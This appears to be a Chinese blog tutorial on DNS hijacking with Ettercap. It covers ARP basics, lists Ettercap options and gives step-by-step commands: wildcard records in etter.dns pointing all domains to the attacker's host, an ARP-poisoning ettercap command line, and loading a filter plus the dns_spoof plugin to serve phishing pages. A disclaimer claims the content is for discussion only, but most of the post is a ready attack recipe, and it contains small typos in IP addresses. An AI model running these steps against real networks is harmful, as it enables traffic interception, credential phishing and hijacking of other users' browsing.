DNS劫持案列

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

一、ARP协议简介

        ARP即地址解析协议,用于现实从ip地址到MAC地址的映射,即询问目标ip对应的MAC地址

        我们能够通过修改mac地址来达到中间人拦截、局域网流控、流量欺骗等情况。

二、Ettercap简介

三、Ettercap常用指令

        1.用户界面类型

        -T,        -text        使用只显示字符的界面

        -q,        -quiet        安静模式,不显示抓到的数据包内容

        -G,        -gtk        使用GTK+GUI,开启图形化模式

        2.日志选项

        -w,        -write<file>        将嗅探到的数据写入pcap文件<file>

        -L,        -log<logfile>        此处记录所有流量<logfile>

        3.通用选项

        -i,        -iface<face>        使用该网络接口

        -l,        -liface        显示所有的网络接口

        -P,        -plugin<plugin>        开始该插件<plugin>

        -F,        -filter<file>        加载过滤器<file>(内容过滤 器)

        4.嗅探与攻击选项

        -M,        mitm<方法:ARGS>        执行mitm攻击

四、Ettercap案例

        1.开启apache服务

        编辑html文件:leafpad  /var/www/html/

        service  apache2  start

        2.编辑ettercap配置文件

        leafpad  /etc/ettercap/etter.dns

        添加

                *                        A        198.168.199.127        根据本地ip填写

                *                        PTR        192.168.199.127        根据本地ip填写

        3.Ettercap使用图形化

        Ettercap -G

        4.命令行测试

        ettercap  -qT  -i  eth0  -M  arp:remote  - w  1.pcap  /kali地址//靶机主机/

        Ettercap替换网页内容---钓鱼

        1.准备过滤脚本

        官方提示脚本:        cd  /usr/share/ettercap/

        2.编译脚本

        etterfilter  head.filter  -o  head.ef                   //head.filter为脚本名字

        3.导入脚本

         Filters -> Load  a  Filter..        选择 脚本文件

        4.继续添加Plugins中的dns_spoof

         5.最后都要选择ARP  poisoning...开始

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值